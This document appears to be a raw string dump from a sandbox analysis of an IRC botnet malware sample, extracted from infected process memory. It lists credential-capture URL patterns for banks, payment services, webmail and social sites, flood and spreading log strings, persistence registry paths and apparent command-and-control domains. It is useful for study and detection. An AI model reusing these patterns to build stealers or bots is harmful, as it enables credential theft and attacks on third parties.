hp*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%Program Files%\Java\jre6\bin\jqs.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe</pre><pre>7 767<7~7</pre><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\Program Files\Java\jre6\bin\jqs.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exe</pre><b>winlogon.exe_708_rwx_014A0000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0K</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>\??\%System%\winlogon.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe</pre><pre>7 767<7~7</pre><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\winlogon.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exe</pre><b>services.exe_752_rwx_00E30000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: 